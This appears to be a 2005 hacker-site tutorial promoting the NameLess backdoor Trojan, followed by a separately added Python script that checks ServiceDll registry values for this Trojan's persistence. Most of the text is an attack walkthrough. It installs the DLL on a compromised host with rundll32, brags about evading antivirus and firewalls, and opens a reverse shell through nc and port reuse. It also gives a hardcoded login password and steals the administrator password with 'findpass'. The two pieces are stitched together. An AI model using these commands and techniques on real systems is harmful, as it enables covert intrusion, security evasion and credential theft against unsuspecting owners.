Mad antivirus, mad firewall: the emerging Trojan NameLess BackDoor, vengeance in mind (figures)

2005-10-21T00:00:00
ID MYHACK58:6220053861
Type myhack58
Reporter Anonymous
Modified 2005-10-21T00:00:00

Description

Editor's note: the source code of the latest version of NameLess mentioned here, 1.4, is available for download on the site.

NameLess is a new kind of DLL Trojan. It has not been around long, but it is definitely a colt with the potential of a thousand-mile horse. Speaking of the predecessors of the NameLess Trojan, one has to mention brother Banyan's BITS and WinEggDrop's PortLess. Both famous Trojans had their moment of glory and can be called elders of the Trojan world. NameLess brings together the advantages of these two Trojans: it is not visible in the target machine's process manager, it normally opens no port, and it provides both forward and reverse connections. NameLess also removes their drawbacks: for example, the bounced cmd.exe process can also be hidden in the target machine's process manager, and the BITS service is not used.

The Trojan says: no port opened, no process, let's see what the firewall and antivirus software can do to me! Drives you mad, ha ha.

NameLess BackDoor drill

Install the NameLess Trojan on the remote host, then connect to the Trojan and control the host: it is like a silent war in the dark, fought right under the nose of the antivirus and the firewall.

One: slipping in on the night wind (installation)

Download the NameLess BackDoor Trojan. The compressed package contains two files named NameLess.dll: one has been packed (compressed with a packer), the other is the unpacked version. First scan the two files locally with various antivirus software. The author used KV2005 with the latest virus database, but KV2005, always known for its detection ability, turned a blind eye to both Trojan files. So it can be installed in any environment with confidence.

How is the Trojan installed on a remote computer? The simplest way, of course, is to scan for and attack a vulnerability on the computer system, and then take control.
There are many ways; however you obtain control of the remote host, upload either of the "NameLess.dll" files above to the remote host. Here the author, after connecting remotely over Telnet, wrote a BAT file for FTP download and set up an FTP service locally, then downloaded the file through that FTP service. This was covered in a previous issue of the journal, so it is not explained further here.

The following focuses on how I installed the Trojan file. In the remote Telnet command window, switch to the directory the file was uploaded to and enter the following command, as shown in Figure 1:

    Rundll32 NameLess.dll,Install

After the command executes, the backdoor is installed successfully. The backdoor automatically replaces the ServiceDll file of the system service Sens, and after the computer restarts it is started by svchost.exe.

Tip: because the NameLess Trojan is a DLL Trojan, the antivirus on the remote host shows no prompt or reaction during installation and startup.

Two: silently through the wall (connecting)

Installation and startup got past the antivirus; next, let's see how the NameLess Trojan leaves the firewall powerless.

Tip: NameLess has two connection modes, forward connection and reverse connection; with the reverse connection mode the firewall does not issue any prompt. In addition, NameLess BackDoor uses a port-reuse technique when connecting to the backdoor: by reusing any port opened by a system process, it can easily penetrate various firewalls.
First we need to scan which ports the remote host has open. Assume the remote host's IP address is 192.168.1.11 and that it has port 139 open. Open a command window locally, switch to the directory containing the "Swiss army knife" NC, and run the following command:

    nc -l -p 12345

After the command executes, port 12345 is listened on locally. Then open another command window and enter the following command, as shown in Figure 2:

    nc 192.168.1.11 139

After the connection is established, enter the following content, as shown in Figure 3:

    dargun|192.168.1.11:12345

The IP address should be changed according to the specific situation. Once the command is executed, the listening window shows the connection prompt "Enter Password:". Enter the password 158352692 and you are logged in to the remote host without being noticed by the firewall! If I were the firewall, I would certainly go mad, ha.

Three: I want... control

Having successfully "maddened" the antivirus and "crazed" the firewall, you can now control the remote host. The power of the NameLess Trojan also shows in its control functions: after connecting and logging in to the remote host, enter the help command to see detailed command help information, as shown in Figure 4. If you have used winshell or wineggdropshell, this type of backdoor will not be unfamiliar; but even if you have never used such a backdoor, you will find it very simple.

1. Cleverly stealing the administrator password

What to do after connecting to the remote host? Let me think... Oh, let's see what the Administrator's password is! Enter the "findpass" command directly in the command window and you will soon see the administrator password, as shown in Figure 5. Really simple enough!
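A defender-side check for the persistence described in the installation section (the Sens service's ServiceDll being replaced so that svchost.exe loads the backdoor), as an added example that is not part of the original article: it parses `reg query` output and flags ServiceDll values that differ from a baseline or sit outside system32. The baseline value, the sample output and the paths in it are constructed assumptions.

```python
import re

# Assumed known-good value for SENS; confirm on a clean machine of the same Windows version.
BASELINE = {"sens": r"%SystemRoot%\System32\sens.dll"}

# Constructed `reg query ...\Services /s /v ServiceDll` output; SENS and ExampleSvc paths are made up.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\System32\qmgr.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleSvc\Parameters
    ServiceDll    REG_EXPAND_SZ    D:\tools\helper.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\Parameters
    ServiceDll    REG_EXPAND_SZ    C:\upload\NameLess.dll
"""

KEY_RE = re.compile(r"^HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\([^\\]+)\\Parameters$", re.I)
VAL_RE = re.compile(r"^\s+ServiceDll\s+REG_(?:EXPAND_)?SZ\s+(.+?)\s*$", re.I)

def normalize(path):
    """Lower-case the path and fold the Windows directory to %systemroot%."""
    p = path.strip().strip('"').lower().replace("/", "\\")
    return re.sub(r"^(?:%systemroot%|%windir%|c:\\windows)(?=\\)", "%systemroot%", p)

def parse_service_dlls(text):
    """Return {service name: raw ServiceDll value} from reg query output."""
    found, service = {}, None
    for line in text.splitlines():
        key, val = KEY_RE.match(line.strip()), VAL_RE.match(line)
        if key:
            service = key.group(1).lower()
        elif val and service:
            found[service] = val.group(1)
    return found

def audit(text, baseline=BASELINE):
    """Flag ServiceDll values that differ from the baseline or sit outside system32."""
    findings = []
    for service, raw in sorted(parse_service_dlls(text).items()):
        path = normalize(raw)
        if service in baseline and path != normalize(baseline[service]):
            findings.append((service, raw, "differs from baseline"))
        elif not path.startswith("%systemroot%\\system32\\"):
            findings.append((service, raw, "outside system32"))
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE))
```

If the DLL file itself is overwritten in place, the registry value does not change, so pair this check with a hash or signature comparison of the file against a known-good copy.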